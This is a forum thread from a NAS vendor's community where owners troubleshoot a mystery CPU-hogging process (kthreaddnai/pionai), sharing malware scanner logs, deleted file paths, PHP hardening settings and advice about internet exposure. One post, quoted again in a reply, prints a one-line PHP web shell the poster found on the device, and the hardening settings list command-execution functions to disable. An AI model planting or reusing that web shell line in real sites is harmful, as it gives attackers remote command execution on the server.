Unknown Thread kthreaddnai

Don't miss a thing. Post your questions and discussion about other uncategorized NAS features here.
kameha
Starting out
Posts: 11
Joined: Wed Mar 28, 2018 8:45 am

Re: Unknown Thread kthreaddnai

Post by kameha »

Both Gitea and Nextcloud are exposed througth ContainerStation
versieck
First post
Posts: 1
Joined: Fri Sep 28, 2018 3:01 pm

Re: Unknown Thread kthreaddnai

Post by versieck »

I encountered the same problem a few days ago.
I have no idea where this process originates from or what is does. It's a complete mystery.
Upgrading to the latest firmware (4.3.5.0756) did not solve the problem.
I did however install the Malware Remover and it did find some malware that was removed.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.log/.cgi_log.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//autorun.sh.infected.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//OewrradzZkb.


App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/.remover_B1KPMM.

After a reboot the pionai process was gone and my CPU usage was back to normal.
The Malware Remover will now scan every day at 03:00AM my system to keep it clean.
KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe »

The malware remover ran for me and did not find anything. After the restart, no process was visible for 2 hours. The process came back overnight. QNAP Support has not commented yet.
User avatar
OneCD
Guru
Posts: 12039
Joined: Sun Aug 21, 2016 10:48 am
Location: "... there, behind that sofa!"

Re: Unknown Thread kthreaddnai

Post by OneCD »

KV17uwe wrote: Thu Nov 15, 2018 12:32 pmAfter the restart, no process was visible for 2 hours. The process came back overnight.
Is any part of your NAS exposed to the Internet?

ImageImageImageImageImageImageImageImageImageImageImageImageImageImageImageImageImageImage
KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe »

OneCD wrote: Thu Nov 15, 2018 1:18 pm
KV17uwe wrote: Thu Nov 15, 2018 12:32 pmAfter the restart, no process was visible for 2 hours. The process came back overnight.
Is any part of your NAS exposed to the Internet?
yes.
cufiler
First post
Posts: 1
Joined: Tue Jun 05, 2012 3:10 pm

Re: Unknown Thread kthreaddnai

Post by cufiler »

I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone call it from internet.

So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On

Thanks to find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe »

cufiler wrote: Thu Nov 15, 2018 6:13 pm I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone call it from internet.

So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On

Thanks to find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
What are these settings?

I have already deleted the folder pionai under / tmp /. Also, I closed port 80. I have not yet made the settings in the INI data.
KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe »

Image

the services back there :(
mneiger
New here
Posts: 6
Joined: Thu May 05, 2016 2:57 am

Re: Unknown Thread kthreaddnai

Post by mneiger »

I have the same critter in my TS-251.
I chased all size 37472 files (god, init, eth1, etc).
I suspect it also uses a few php files in /share/Web which I deleted
47D51F0071A7AA3AF1ED0669843E113B.php
images.php

good luck
User avatar
Trexx
Ask me anything
Posts: 5393
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota

Re: Unknown Thread kthreaddnai

Post by Trexx »

You might try using the new malware remover to see if that cleans it better. BUT that is NOT going to prevent infection (it doesn't run real-time), it only removes it. The only way to 100% prevent infection is not to expose your NAS to the internet. A full featured IPS/IDS platform / reverse proxies/etc. can help mitigate risk as well.
Paul

Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350

Model:TVS-673 32GB & TS-228a Offline[/color]
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
User avatar
dolbyman
Guru
Posts: 35024
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Unknown Thread kthreaddnai

Post by dolbyman »

and all please open tickets with qnap so they can investigate+improve malware removal
kameha
Starting out
Posts: 11
Joined: Wed Mar 28, 2018 8:45 am

Re: Unknown Thread kthreaddnai

Post by kameha »

Hello !

I completely reinstall my Nas on the last days (data backup + full disk format on another PC).
All was OK until I reinstall yesterday CodexPack and PhotoStation so i suspect it's coming from one of them..

Still investigating...
KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe »

To close Port 80 has temporarily brought peace first. QNAP still has not processed my ticket.
maestro72x
Getting the hang of things
Posts: 62
Joined: Thu Jun 03, 2010 5:16 am

Re: Unknown Thread kthreaddnai

Post by maestro72x »

any luck getting rid of it? im having same issues
Elbows
Starting out
Posts: 31
Joined: Thu May 07, 2009 9:58 pm

Re: Unknown Thread kthreaddnai

Post by Elbows »

I had the 'pionai' process running and raised a helpdesk ticket.

I've posted the fix I was given here: viewtopic.php?f=182&t=144954&p=694152#p694152

It worked for me :-)
QNAP TVS1282 (PRD box)
V4.5.1.1540
8x Seagate 8TB Ironwolf (2x RAID 5 Storage Pools)
4x 1TB Crucial SSD (2x RAID1 Storage Pools)
2x 500GB Samsung PCIe RAID 0 R/W Cache

QNAP TS670 Pro (DEV/Backup box)
V4.3.7.(latest) EOL
6x Seagate 8TB Ironwolf RAID 5

Riello VSD 1500 UPS
Post Reply

Return to “Miscellaneous”